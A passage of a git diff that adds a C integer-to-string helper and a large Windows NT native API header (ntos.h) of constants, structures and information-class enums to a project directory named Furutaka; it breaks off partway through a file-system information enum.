b/Source/Furutaka/minirtl/ultostr.c @@ -0,0 +1,45 @@ +#include "rtltypes.h" + +size_t ultostr_a(unsigned long x, char *s) +{ + unsigned long t=x; + size_t i, r=1; + + while ( t >= 10 ) { + t /= 10; + r++; + } + + if (s == 0) + return r; + + for (i = r; i != 0; i--) { + s[i-1] = (char)(x % 10) + '0'; + x /= 10; + } + + s[r] = (char)0; + return r; +} + +size_t ultostr_w(unsigned long x, wchar_t *s) +{ + unsigned long t=x; + size_t i, r=1; + + while ( t >= 10 ) { + t /= 10; + r++; + } + + if (s == 0) + return r; + + for (i = r; i != 0; i--) { + s[i-1] = (wchar_t)(x % 10) + L'0'; + x /= 10; + } + + s[r] = (wchar_t)0; + return r; +} diff --git a/Source/Furutaka/ntos.h b/Source/Furutaka/ntos.h new file mode 100644 index 0000000..3b36663 --- /dev/null +++ b/Source/Furutaka/ntos.h @@ -0,0 +1,4904 @@ +/************************************************************************************ +* +* (C) COPYRIGHT AUTHORS, 2015, translated from Microsoft sources/debugger +* +* TITLE: NTOS.H +* +* VERSION: 1.33 +* +* DATE: 02 Feb 2016 +* +* Common header file for the ntos API functions and definitions. +* +* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF +* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED +* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A +* PARTICULAR PURPOSE. +* +************************************************************************************/ + +#pragma comment(lib, "ntdll.lib") + +#pragma warning(disable: 4214) // nonstandard extension used : bit field types other than int + +#define IN_REGION(x, Base, Size) (((ULONG_PTR)x >= (ULONG_PTR)Base) && ((ULONG_PTR)x <= (ULONG_PTR)Base + (ULONG_PTR)Size)) + +#define ALIGN_DOWN(count,size) \ + ((ULONG_PTR)(count) & ~((ULONG_PTR)(size) - 1)) + +#define ALIGN_UP(count,size) \ + (ALIGN_DOWN( (ULONG_PTR)(count)+(ULONG_PTR)(size)-1, (ULONG_PTR)(size) )) + +//Access Rights + +#define CALLBACK_MODIFY_STATE 0x0001 +#define CALLBACK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|CALLBACK_MODIFY_STATE ) + +#define DEBUG_READ_EVENT (0x0001) +#define DEBUG_PROCESS_ASSIGN (0x0002) +#define DEBUG_SET_INFORMATION (0x0004) +#define DEBUG_QUERY_INFORMATION (0x0008) +#define DEBUG_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|DEBUG_READ_EVENT|DEBUG_PROCESS_ASSIGN|\ + DEBUG_SET_INFORMATION|DEBUG_QUERY_INFORMATION) + +#define DIRECTORY_QUERY (0x0001) +#define DIRECTORY_TRAVERSE (0x0002) +#define DIRECTORY_CREATE_OBJECT (0x0004) +#define DIRECTORY_CREATE_SUBDIRECTORY (0x0008) +#define DIRECTORY_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0xF) + +#define EVENT_QUERY_STATE 0x0001 +#define EVENT_MODIFY_STATE 0x0002 +#define EVENT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|0x3) + +#define EVENT_PAIR_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE) + +#define IO_COMPLETION_QUERY_STATE 0x0001 +#define IO_COMPLETION_MODIFY_STATE 0x0002 +#define IO_COMPLETION_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|0x3) + +#define KEYEDEVENT_WAIT 0x0001 +#define KEYEDEVENT_WAKE 0x0002 +#define KEYEDEVENT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | KEYEDEVENT_WAIT | KEYEDEVENT_WAKE) + +#define MUTANT_QUERY_STATE 0x0001 +#define MUTANT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|MUTANT_QUERY_STATE) + +#define PORT_CONNECT (0x0001) +#define PORT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0x1) + +#define PROFILE_CONTROL (0x0001) +#define PROFILE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | PROFILE_CONTROL) + +#define SEMAPHORE_QUERY_STATE 0x0001 +#define SEMAPHORE_MODIFY_STATE 0x0002 +#define SEMAPHORE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|0x3) + +#define SYMBOLIC_LINK_QUERY (0x0001) +#define SYMBOLIC_LINK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1) + +#define THREAD_ALERT (0x0004) + +#define WORKER_FACTORY_RELEASE_WORKER 0x0001 +#define WORKER_FACTORY_WAIT 0x0002 +#define WORKER_FACTORY_SET_INFORMATION 0x0004 +#define WORKER_FACTORY_QUERY_INFORMATION 0x0008 +#define WORKER_FACTORY_READY_WORKER 0x0010 +#define WORKER_FACTORY_SHUTDOWN 0x0020 + +#define OBJECT_TYPE_CREATE (0x0001) +#define OBJECT_TYPE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1) + +#define WMIGUID_QUERY 0x0001 +#define WMIGUID_SET 0x0002 +#define WMIGUID_NOTIFICATION 0x0004 +#define WMIGUID_READ_DESCRIPTION 0x0008 +#define WMIGUID_EXECUTE 0x0010 +#define TRACELOG_CREATE_REALTIME 0x0020 +#define TRACELOG_CREATE_ONDISK 0x0040 +#define TRACELOG_GUID_ENABLE 0x0080 +#define TRACELOG_ACCESS_KERNEL_LOGGER 0x0100 +#define TRACELOG_CREATE_INPROC 0x0200 +#define TRACELOG_ACCESS_REALTIME 0x0400 +#define TRACELOG_REGISTER_GUIDS 0x0800 + +#define NtCurrentThread() ( (HANDLE)(LONG_PTR) -2 ) +#define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 ) +#define ZwCurrentProcess() NtCurrentProcess() +#define ZwCurrentThread() NtCurrentThread() + +// +// Define special ByteOffset parameters for read and write operations +// + +#define FILE_WRITE_TO_END_OF_FILE 0xffffffff +#define FILE_USE_FILE_POINTER_POSITION 0xfffffffe + +// +// This is the maximum MaximumLength for a UNICODE_STRING. +// + +#define MAXUSHORT 0xffff +#define MAX_USTRING ( sizeof(WCHAR) * (MAXUSHORT/sizeof(WCHAR)) ) + +typedef struct _UNICODE_STRING { + USHORT Length; + USHORT MaximumLength; + PWSTR Buffer; +} UNICODE_STRING; +typedef UNICODE_STRING *PUNICODE_STRING; +typedef const UNICODE_STRING *PCUNICODE_STRING; + +typedef struct _STRING +{ + USHORT Length; + USHORT MaximumLength; + PCHAR Buffer; +} STRING; +typedef STRING *PSTRING; + +typedef STRING ANSI_STRING; +typedef PSTRING PANSI_STRING; + +typedef STRING OEM_STRING; +typedef PSTRING POEM_STRING; +typedef CONST STRING* PCOEM_STRING; +typedef CONST char *PCSZ; + +typedef struct _CSTRING +{ + USHORT Length; + USHORT MaximumLength; + CONST char *Buffer; +} CSTRING; +typedef CSTRING *PCSTRING; +#define ANSI_NULL ((CHAR)0) + +typedef STRING CANSI_STRING; +typedef PSTRING PCANSI_STRING; + +typedef struct _OBJECT_ATTRIBUTES { + ULONG Length; + HANDLE RootDirectory; + PUNICODE_STRING ObjectName; + ULONG Attributes; + PVOID SecurityDescriptor; + PVOID SecurityQualityOfService; +} OBJECT_ATTRIBUTES; +typedef OBJECT_ATTRIBUTES *POBJECT_ATTRIBUTES; + +typedef struct _IO_STATUS_BLOCK { + union { + NTSTATUS Status; + PVOID Pointer; + } DUMMYUNIONNAME; + + ULONG_PTR Information; +} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK; + +/* +** Semaphore START +*/ + +#ifndef _SEMAPHORE_INFORMATION_CLASS +typedef enum _SEMAPHORE_INFORMATION_CLASS { + SemaphoreBasicInformation +} SEMAPHORE_INFORMATION_CLASS; +#endif + +#ifndef _SEMAPHORE_BASIC_INFORMATION +typedef struct _SEMAPHORE_BASIC_INFORMATION { + LONG CurrentCount; + LONG MaximumCount; +} SEMAPHORE_BASIC_INFORMATION, *PSEMAPHORE_BASIC_INFORMATION; +#endif + +/* +** Semaphore END +*/ + +/* +** FileCache and MemoryList START +*/ + +typedef enum _SYSTEM_MEMORY_LIST_COMMAND { + MemoryCaptureAccessedBits, + MemoryCaptureAndResetAccessedBits, + MemoryEmptyWorkingSets, + MemoryFlushModifiedList, + MemoryPurgeStandbyList, + MemoryPurgeLowPriorityStandbyList, + MemoryCommandMax +} SYSTEM_MEMORY_LIST_COMMAND; + +typedef struct _SYSTEM_FILECACHE_INFORMATION { + SIZE_T CurrentSize; + SIZE_T PeakSize; + ULONG PageFaultCount; + SIZE_T MinimumWorkingSet; + SIZE_T MaximumWorkingSet; + SIZE_T CurrentSizeIncludingTransitionInPages; + SIZE_T PeakSizeIncludingTransitionInPages; + ULONG TransitionRePurposeCount; + ULONG Flags; +} SYSTEM_FILECACHE_INFORMATION, *PSYSTEM_FILECACHE_INFORMATION; + +/* +** FileCache and MemoryList END +*/ + +/* +** Processes START +*/ + +#ifndef KPRIORITY +typedef LONG KPRIORITY; +#endif + +typedef enum _THREAD_STATE { + StateInitialized, + StateReady, + StateRunning, + StateStandby, + StateTerminated, + StateWait, + StateTransition, + StateUnknown +} THREAD_STATE; + +typedef enum _KWAIT_REASON { + Executive, + FreePage, + PageIn, + PoolAllocation, + DelayExecution, + Suspended, + UserRequest, + WrExecutive, + WrFreePage, + WrPageIn, + WrPoolAllocation, + WrDelayExecution, + WrSuspended, + WrUserRequest, + WrEventPair, + WrQueue, + WrLpcReceive, + WrLpcReply, + WrVirtualMemory, + WrPageOut, + WrRendezvous, + WrKeyedEvent, + WrTerminated, + WrProcessInSwap, + WrCpuRateControl, + WrCalloutStack, + WrKernel, + WrResource, + WrPushLock, + WrMutex, + WrQuantumEnd, + WrDispatchInt, + WrPreempted, + WrYieldExecution, + WrFastMutex, + WrGuardedMutex, + WrRundown, + MaximumWaitReason +} KWAIT_REASON; + +typedef VOID KSTART_ROUTINE( + _In_ PVOID StartContext + ); +typedef KSTART_ROUTINE *PKSTART_ROUTINE; + +typedef struct _CLIENT_ID { + HANDLE UniqueProcess; + HANDLE UniqueThread; +} CLIENT_ID, *PCLIENT_ID; + +typedef struct _VM_COUNTERS { + SIZE_T PeakVirtualSize; + SIZE_T VirtualSize; + ULONG PageFaultCount; + SIZE_T PeakWorkingSetSize; + SIZE_T WorkingSetSize; + SIZE_T QuotaPeakPagedPoolUsage; + SIZE_T QuotaPagedPoolUsage; + SIZE_T QuotaPeakNonPagedPoolUsage; + SIZE_T QuotaNonPagedPoolUsage; + SIZE_T PagefileUsage; + SIZE_T PeakPagefileUsage; + SIZE_T PrivatePageCount; +} VM_COUNTERS; + +typedef struct _SYSTEM_THREAD_INFORMATION { + LARGE_INTEGER KernelTime; + LARGE_INTEGER UserTime; + LARGE_INTEGER CreateTime; + ULONG WaitTime; + PVOID StartAddress; + CLIENT_ID ClientId; + KPRIORITY Priority; + KPRIORITY BasePriority; + ULONG ContextSwitchCount; + THREAD_STATE State; + KWAIT_REASON WaitReason; +} SYSTEM_THREAD_INFORMATION, *PSYSTEM_THREAD_INFORMATION; + +typedef struct _SYSTEM_PROCESSES_INFORMATION { + ULONG NextEntryDelta; + ULONG ThreadCount; + LARGE_INTEGER SpareLi1; + LARGE_INTEGER SpareLi2; + LARGE_INTEGER SpareLi3; + LARGE_INTEGER CreateTime; + LARGE_INTEGER UserTime; + LARGE_INTEGER KernelTime; + UNICODE_STRING ImageName; + KPRIORITY BasePriority; + HANDLE UniqueProcessId; + HANDLE InheritedFromUniqueProcessId; + ULONG HandleCount; + ULONG SessionId; + ULONG_PTR PageDirectoryBase; + VM_COUNTERS VmCounters; + IO_COUNTERS IoCounters; + SYSTEM_THREAD_INFORMATION Threads[1]; +} SYSTEM_PROCESSES_INFORMATION, *PSYSTEM_PROCESSES_INFORMATION; + +typedef enum _PROCESSINFOCLASS { + ProcessBasicInformation = 0, + ProcessQuotaLimits = 1, + ProcessIoCounters = 2, + ProcessVmCounters = 3, + ProcessTimes = 4, + ProcessBasePriority = 5, + ProcessRaisePriority = 6, + ProcessDebugPort = 7, + ProcessExceptionPort = 8, + ProcessAccessToken = 9, + ProcessLdtInformation = 10, + ProcessLdtSize = 11, + ProcessDefaultHardErrorMode = 12, + ProcessIoPortHandlers = 13, + ProcessPooledUsageAndLimits = 14, + ProcessWorkingSetWatch = 15, + ProcessUserModeIOPL = 16, + ProcessEnableAlignmentFaultFixup = 17, + ProcessPriorityClass = 18, + ProcessWx86Information = 19, + ProcessHandleCount = 20, + ProcessAffinityMask = 21, + ProcessPriorityBoost = 22, + ProcessDeviceMap = 23, + ProcessSessionInformation = 24, + ProcessForegroundInformation = 25, + ProcessWow64Information = 26, + ProcessImageFileName = 27, + ProcessLUIDDeviceMapsEnabled = 28, + ProcessBreakOnTermination = 29, + ProcessDebugObjectHandle = 30, + ProcessDebugFlags = 31, + ProcessHandleTracing = 32, + ProcessIoPriority = 33, + ProcessExecuteFlags = 34, + ProcessTlsInformation = 35, + ProcessCookie = 36, + ProcessImageInformation = 37, + ProcessCycleTime = 38, + ProcessPagePriority = 39, + ProcessInstrumentationCallback = 40, + ProcessThreadStackAllocation = 41, + ProcessWorkingSetWatchEx = 42, + ProcessImageFileNameWin32 = 43, + ProcessImageFileMapping = 44, + ProcessAffinityUpdateMode = 45, + ProcessMemoryAllocationMode = 46, + ProcessGroupInformation = 47, + ProcessTokenVirtualizationEnabled = 48, + ProcessOwnerInformation = 49, + ProcessWindowInformation = 50, + ProcessHandleInformation = 51, + ProcessMitigationPolicy = 52, + ProcessDynamicFunctionTableInformation = 53, + ProcessHandleCheckingMode = 54, + ProcessKeepAliveCount = 55, + ProcessRevokeFileHandles = 56, + ProcessWorkingSetControl = 57, + ProcessHandleTable = 58, + ProcessCheckStackExtentsMode = 59, + ProcessCommandLineInformation = 60, + ProcessProtectionInformation = 61, + MaxProcessInfoClass = 62 +} PROCESSINFOCLASS; + +typedef struct _PROCESS_BASIC_INFORMATION { + NTSTATUS ExitStatus; + PVOID PebBaseAddress; + ULONG_PTR AffinityMask; + KPRIORITY BasePriority; + ULONG_PTR UniqueProcessId; + ULONG_PTR InheritedFromUniqueProcessId; +} PROCESS_BASIC_INFORMATION; +typedef PROCESS_BASIC_INFORMATION *PPROCESS_BASIC_INFORMATION; + +typedef struct _PROCESS_EXTENDED_BASIC_INFORMATION { + SIZE_T Size; + PROCESS_BASIC_INFORMATION BasicInfo; + union + { + ULONG Flags; + struct + { + ULONG IsProtectedProcess : 1; + ULONG IsWow64Process : 1; + ULONG IsProcessDeleting : 1; + ULONG IsCrossSessionCreate : 1; + ULONG IsFrozen : 1; + ULONG IsBackground : 1; + ULONG IsStronglyNamed : 1; + ULONG SpareBits : 25; + } DUMMYSTRUCTNAME; + } DUMMYUNIONNAME; +} PROCESS_EXTENDED_BASIC_INFORMATION, *PPROCESS_EXTENDED_BASIC_INFORMATION; + +/* +** Processes END +*/ + +#ifndef _SYSTEM_INFORMATION_CLASS +typedef enum _SYSTEM_INFORMATION_CLASS +{ + SystemBasicInformation = 0, + SystemProcessorInformation = 1, + SystemPerformanceInformation = 2, + SystemTimeOfDayInformation = 3, + SystemPathInformation = 4, + SystemProcessInformation = 5, + SystemCallCountInformation = 6, + SystemDeviceInformation = 7, + SystemProcessorPerformanceInformation = 8, + SystemFlagsInformation = 9, + SystemCallTimeInformation = 10, + SystemModuleInformation = 11, + SystemLocksInformation = 12, + SystemStackTraceInformation = 13, + SystemPagedPoolInformation = 14, + SystemNonPagedPoolInformation = 15, + SystemHandleInformation = 16, + SystemObjectInformation = 17, + SystemPageFileInformation = 18, + SystemVdmInstemulInformation = 19, + SystemVdmBopInformation = 20, + SystemFileCacheInformation = 21, + SystemPoolTagInformation = 22, + SystemInterruptInformation = 23, + SystemDpcBehaviorInformation = 24, + SystemFullMemoryInformation = 25, + SystemLoadGdiDriverInformation = 26, + SystemUnloadGdiDriverInformation = 27, + SystemTimeAdjustmentInformation = 28, + SystemSummaryMemoryInformation = 29, + SystemMirrorMemoryInformation = 30, + SystemPerformanceTraceInformation = 31, + SystemObsolete0 = 32, + SystemExceptionInformation = 33, + SystemCrashDumpStateInformation = 34, + SystemKernelDebuggerInformation = 35, + SystemContextSwitchInformation = 36, + SystemRegistryQuotaInformation = 37, + SystemExtendServiceTableInformation = 38, + SystemPrioritySeperation = 39, + SystemVerifierAddDriverInformation = 40, + SystemVerifierRemoveDriverInformation = 41, + SystemProcessorIdleInformation = 42, + SystemLegacyDriverInformation = 43, + SystemCurrentTimeZoneInformation = 44, + SystemLookasideInformation = 45, + SystemTimeSlipNotification = 46, + SystemSessionCreate = 47, + SystemSessionDetach = 48, + SystemSessionInformation = 49, + SystemRangeStartInformation = 50, + SystemVerifierInformation = 51, + SystemVerifierThunkExtend = 52, + SystemSessionProcessInformation = 53, + SystemLoadGdiDriverInSystemSpace = 54, + SystemNumaProcessorMap = 55, + SystemPrefetcherInformation = 56, + SystemExtendedProcessInformation = 57, + SystemRecommendedSharedDataAlignment = 58, + SystemComPlusPackage = 59, + SystemNumaAvailableMemory = 60, + SystemProcessorPowerInformation = 61, + SystemEmulationBasicInformation = 62, + SystemEmulationProcessorInformation = 63, + SystemExtendedHandleInformation = 64, + SystemLostDelayedWriteInformation = 65, + SystemBigPoolInformation = 66, + SystemSessionPoolTagInformation = 67, + SystemSessionMappedViewInformation = 68, + SystemHotpatchInformation = 69, + SystemObjectSecurityMode = 70, + SystemWatchdogTimerHandler = 71, + SystemWatchdogTimerInformation = 72, + SystemLogicalProcessorInformation = 73, + SystemWow64SharedInformationObsolete = 74, + SystemRegisterFirmwareTableInformationHandler = 75, + SystemFirmwareTableInformation = 76, + SystemModuleInformationEx = 77, + SystemVerifierTriageInformation = 78, + SystemSuperfetchInformation = 79, + SystemMemoryListInformation = 80, + SystemFileCacheInformationEx = 81, + SystemThreadPriorityClientIdInformation = 82, + SystemProcessorIdleCycleTimeInformation = 83, + SystemVerifierCancellationInformation = 84, + SystemProcessorPowerInformationEx = 85, + SystemRefTraceInformation = 86, + SystemSpecialPoolInformation = 87, + SystemProcessIdInformation = 88, + SystemErrorPortInformation = 89, + SystemBootEnvironmentInformation = 90, + SystemHypervisorInformation = 91, + SystemVerifierInformationEx = 92, + SystemTimeZoneInformation = 93, + SystemImageFileExecutionOptionsInformation = 94, + SystemCoverageInformation = 95, + SystemPrefetchPatchInformation = 96, + SystemVerifierFaultsInformation = 97, + SystemSystemPartitionInformation = 98, + SystemSystemDiskInformation = 99, + SystemProcessorPerformanceDistribution = 100, + SystemNumaProximityNodeInformation = 101, + SystemDynamicTimeZoneInformation = 102, + SystemCodeIntegrityInformation = 103, + SystemProcessorMicrocodeUpdateInformation = 104, + SystemProcessorBrandString = 105, + SystemVirtualAddressInformation = 106, + SystemLogicalProcessorAndGroupInformation = 107, + SystemProcessorCycleTimeInformation = 108, + SystemStoreInformation = 109, + SystemRegistryAppendString = 110, + SystemAitSamplingValue = 111, + SystemVhdBootInformation = 112, + SystemCpuQuotaInformation = 113, + SystemNativeBasicInformation = 114, + SystemErrorPortTimeouts = 115, + SystemLowPriorityIoInformation = 116, + SystemBootEntropyInformation = 117, + SystemVerifierCountersInformation = 118, + SystemPagedPoolInformationEx = 119, + SystemSystemPtesInformationEx = 120, + SystemNodeDistanceInformation = 121, + SystemAcpiAuditInformation = 122, + SystemBasicPerformanceInformation = 123, + SystemQueryPerformanceCounterInformation = 124, + SystemSessionBigPoolInformation = 125, + SystemBootGraphicsInformation = 126, + SystemScrubPhysicalMemoryInformation = 127, + SystemBadPageInformation = 128, + SystemProcessorProfileControlArea = 129, + SystemCombinePhysicalMemoryInformation = 130, + SystemEntropyInterruptTimingInformation = 131, + SystemConsoleInformation = 132, + SystemPlatformBinaryInformation = 133, + SystemPolicyInformation = 134, + SystemHypervisorProcessorCountInformation = 135, + SystemDeviceDataInformation = 136, + SystemDeviceDataEnumerationInformation = 137, + SystemMemoryTopologyInformation = 138, + SystemMemoryChannelInformation = 139, + SystemBootLogoInformation = 140, + SystemProcessorPerformanceInformationEx = 141, + SystemSpare0 = 142, + SystemSecureBootPolicyInformation = 143, + SystemPageFileInformationEx = 144, + SystemSecureBootInformation = 145, + SystemEntropyInterruptTimingRawInformation = 146, + SystemPortableWorkspaceEfiLauncherInformation = 147, + SystemFullProcessInformation = 148, + SystemKernelDebuggerInformationEx = 149, + SystemBootMetadataInformation = 150, + SystemSoftRebootInformation = 151, + SystemElamCertificateInformation = 152, + SystemOfflineDumpConfigInformation = 153, + SystemProcessorFeaturesInformation = 154, + SystemRegistryReconciliationInformation = 155, + SystemEdidInformation = 156, + MaxSystemInfoClass = 157 +} SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS; +#endif + +/* +** Timer START +*/ + +// +// Timer APC routine definition. +// + +typedef VOID(*PTIMER_APC_ROUTINE) ( + _In_ PVOID TimerContext, + _In_ ULONG TimerLowValue, + _In_ LONG TimerHighValue + ); + +typedef enum _TIMER_TYPE { + NotificationTimer, + SynchronizationTimer +} TIMER_TYPE; + +#ifndef _TIMER_INFORMATION_CLASS +typedef enum _TIMER_INFORMATION_CLASS { + TimerBasicInformation +} TIMER_INFORMATION_CLASS; +#endif + +#ifndef _TIMER_BASIC_INFORMATION +typedef struct _TIMER_BASIC_INFORMATION { + LARGE_INTEGER RemainingTime; + BOOLEAN TimerState; +} TIMER_BASIC_INFORMATION, *PTIMER_BASIC_INFORMATION; +#endif + +/* +** Timer END +*/ + +typedef VOID(NTAPI *PIO_APC_ROUTINE)( + _In_ PVOID ApcContext, + _In_ PIO_STATUS_BLOCK IoStatusBlock, + _In_ ULONG Reserved + ); + +typedef struct _OBJECT_DIRECTORY_INFORMATION { + UNICODE_STRING Name; + UNICODE_STRING TypeName; +} OBJECT_DIRECTORY_INFORMATION, *POBJECT_DIRECTORY_INFORMATION; + +#ifndef InitializeObjectAttributes +#define InitializeObjectAttributes( p, n, a, r, s ) { \ + (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \ + (p)->RootDirectory = r; \ + (p)->Attributes = a; \ + (p)->ObjectName = n; \ + (p)->SecurityDescriptor = s; \ + (p)->SecurityQualityOfService = NULL; \ + } + +// +// Valid values for the Attributes field +// + +#define OBJ_INHERIT 0x00000002L +#define OBJ_PERMANENT 0x00000010L +#define OBJ_EXCLUSIVE 0x00000020L +#define OBJ_CASE_INSENSITIVE 0x00000040L +#define OBJ_OPENIF 0x00000080L +#define OBJ_OPENLINK 0x00000100L +#define OBJ_KERNEL_HANDLE 0x00000200L +#define OBJ_FORCE_ACCESS_CHECK 0x00000400L +#define OBJ_VALID_ATTRIBUTES 0x000007F2L + +#endif + + +/* +** Objects START +*/ + +#ifndef _OBJECT_INFORMATION_CLASS +typedef enum _OBJECT_INFORMATION_CLASS { + ObjectBasicInformation, + ObjectNameInformation, + ObjectTypeInformation, + ObjectTypesInformation, + ObjectHandleFlagInformation, + ObjectSessionInformation, + MaxObjectInfoClass +} OBJECT_INFORMATION_CLASS; +#endif + +#ifndef _OBJECT_BASIC_INFORMATION +typedef struct _OBJECT_BASIC_INFORMATION { + ULONG Attributes; + ACCESS_MASK GrantedAccess; + ULONG HandleCount; + ULONG PointerCount; + ULONG PagedPoolCharge; + ULONG NonPagedPoolCharge; + ULONG Reserved[3]; + ULONG NameInfoSize; + ULONG TypeInfoSize; + ULONG SecurityDescriptorSize; + LARGE_INTEGER CreationTime; +} OBJECT_BASIC_INFORMATION, *POBJECT_BASIC_INFORMATION; +#endif + +#ifndef _OBJECT_NAME_INFORMATION +typedef struct _OBJECT_NAME_INFORMATION { + UNICODE_STRING Name; +} OBJECT_NAME_INFORMATION, *POBJECT_NAME_INFORMATION; +#endif + +#ifndef _OBJECT_TYPE_INFORMATION +typedef struct _OBJECT_TYPE_INFORMATION { + UNICODE_STRING TypeName; + ULONG TotalNumberOfObjects; + ULONG TotalNumberOfHandles; + ULONG TotalPagedPoolUsage; + ULONG TotalNonPagedPoolUsage; + ULONG TotalNamePoolUsage; + ULONG TotalHandleTableUsage; + ULONG HighWaterNumberOfObjects; + ULONG HighWaterNumberOfHandles; + ULONG HighWaterPagedPoolUsage; + ULONG HighWaterNonPagedPoolUsage; + ULONG HighWaterNamePoolUsage; + ULONG HighWaterHandleTableUsage; + ULONG InvalidAttributes; + GENERIC_MAPPING GenericMapping; + ULONG ValidAccessMask; + BOOLEAN SecurityRequired; + BOOLEAN MaintainHandleCount; + ULONG PoolType; + ULONG DefaultPagedPoolCharge; + ULONG DefaultNonPagedPoolCharge; +} OBJECT_TYPE_INFORMATION, *POBJECT_TYPE_INFORMATION; +#endif + +typedef struct _OBJECT_TYPE_INFORMATION_8 { + UNICODE_STRING TypeName; + ULONG TotalNumberOfObjects; + ULONG TotalNumberOfHandles; + ULONG TotalPagedPoolUsage; + ULONG TotalNonPagedPoolUsage; + ULONG TotalNamePoolUsage; + ULONG TotalHandleTableUsage; + ULONG HighWaterNumberOfObjects; + ULONG HighWaterNumberOfHandles; + ULONG HighWaterPagedPoolUsage; + ULONG HighWaterNonPagedPoolUsage; + ULONG HighWaterNamePoolUsage; + ULONG HighWaterHandleTableUsage; + ULONG InvalidAttributes; + GENERIC_MAPPING GenericMapping; + ULONG ValidAccessMask; + BOOLEAN SecurityRequired; + BOOLEAN MaintainHandleCount; + UCHAR TypeIndex; + CHAR ReservedByte; + ULONG PoolType; + ULONG DefaultPagedPoolCharge; + ULONG DefaultNonPagedPoolCharge; +} OBJECT_TYPE_INFORMATION_8, *POBJECT_TYPE_INFORMATION_8; + +#ifndef _OBJECT_TYPES_INFORMATION +typedef struct _OBJECT_TYPES_INFORMATION +{ + ULONG NumberOfTypes; + OBJECT_TYPE_INFORMATION TypeInformation; +} OBJECT_TYPES_INFORMATION, *POBJECT_TYPES_INFORMATION; +#endif + +#ifndef _OBJECT_HANDLE_FLAG_INFORMATION +typedef struct _OBJECT_HANDLE_FLAG_INFORMATION +{ + BOOLEAN Inherit; + BOOLEAN ProtectFromClose; +} OBJECT_HANDLE_FLAG_INFORMATION, *POBJECT_HANDLE_FLAG_INFORMATION; +#endif +/* +** Objects END +*/ + +/* +** File start +*/ + +#define FILE_SUPERSEDE 0x00000000 +#define FILE_OPEN 0x00000001 +#define FILE_CREATE 0x00000002 +#define FILE_OPEN_IF 0x00000003 +#define FILE_OVERWRITE 0x00000004 +#define FILE_OVERWRITE_IF 0x00000005 +#define FILE_MAXIMUM_DISPOSITION 0x00000005 + +#define FILE_DIRECTORY_FILE 0x00000001 +#define FILE_WRITE_THROUGH 0x00000002 +#define FILE_SEQUENTIAL_ONLY 0x00000004 +#define FILE_NO_INTERMEDIATE_BUFFERING 0x00000008 + +#define FILE_SYNCHRONOUS_IO_ALERT 0x00000010 +#define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020 +#define FILE_NON_DIRECTORY_FILE 0x00000040 +#define FILE_CREATE_TREE_CONNECTION 0x00000080 + +#define FILE_COMPLETE_IF_OPLOCKED 0x00000100 +#define FILE_NO_EA_KNOWLEDGE 0x00000200 +#define FILE_OPEN_FOR_RECOVERY 0x00000400 +#define FILE_RANDOM_ACCESS 0x00000800 + +#define FILE_DELETE_ON_CLOSE 0x00001000 +#define FILE_OPEN_BY_FILE_ID 0x00002000 +#define FILE_OPEN_FOR_BACKUP_INTENT 0x00004000 +#define FILE_NO_COMPRESSION 0x00008000 + +#define FILE_RESERVE_OPFILTER 0x00100000 +#define FILE_OPEN_REPARSE_POINT 0x00200000 +#define FILE_OPEN_NO_RECALL 0x00400000 +#define FILE_OPEN_FOR_FREE_SPACE_QUERY 0x00800000 + + +#define FILE_COPY_STRUCTURED_STORAGE 0x00000041 +#define FILE_STRUCTURED_STORAGE 0x00000441 + +#define FILE_VALID_OPTION_FLAGS 0x00ffffff +#define FILE_VALID_PIPE_OPTION_FLAGS 0x00000032 +#define FILE_VALID_MAILSLOT_OPTION_FLAGS 0x00000032 +#define FILE_VALID_SET_FLAGS 0x00000036 + +#ifndef _FILE_INFORMATION_CLASS +typedef enum _FILE_INFORMATION_CLASS +{ + FileDirectoryInformation = 1, + FileFullDirectoryInformation, + FileBothDirectoryInformation, + FileBasicInformation, + FileStandardInformation, + FileInternalInformation, + FileEaInformation, + FileAccessInformation, + FileNameInformation, + FileRenameInformation, + FileLinkInformation, + FileNamesInformation, + FileDispositionInformation, + FilePositionInformation, + FileFullEaInformation, + FileModeInformation, + FileAlignmentInformation, + FileAllInformation, + FileAllocationInformation, + FileEndOfFileInformation, + FileAlternateNameInformation, + FileStreamInformation, + FilePipeInformation, + FilePipeLocalInformation, + FilePipeRemoteInformation, + FileMailslotQueryInformation, + FileMailslotSetInformation, + FileCompressionInformation, + FileObjectIdInformation, + FileCompletionInformation, + FileMoveClusterInformation, + FileQuotaInformation, + FileReparsePointInformation, + FileNetworkOpenInformation, + FileAttributeTagInformation, + FileTrackingInformation, + FileIdBothDirectoryInformation, + FileIdFullDirectoryInformation, + FileValidDataLengthInformation, + FileShortNameInformation, + FileIoCompletionNotificationInformation, + FileIoStatusBlockRangeInformation, + FileIoPriorityHintInformation, + FileSfioReserveInformation, + FileSfioVolumeInformation, + FileHardLinkInformation, + FileProcessIdsUsingFileInformation, + FileNormalizedNameInformation, + FileNetworkPhysicalNameInformation, + FileIdGlobalTxDirectoryInformation, + FileMaximumInformation +} FILE_INFORMATION_CLASS, *PFILE_INFORMATION_CLASS; +#endif + +#ifndef _FILE_INFORMATION_CLASS +typedef enum _FSINFOCLASS { + FileFsVolumeInformation = 1, + FileFsLabelInformation, + FileFsSizeInformation, + FileFsDeviceInformation, + 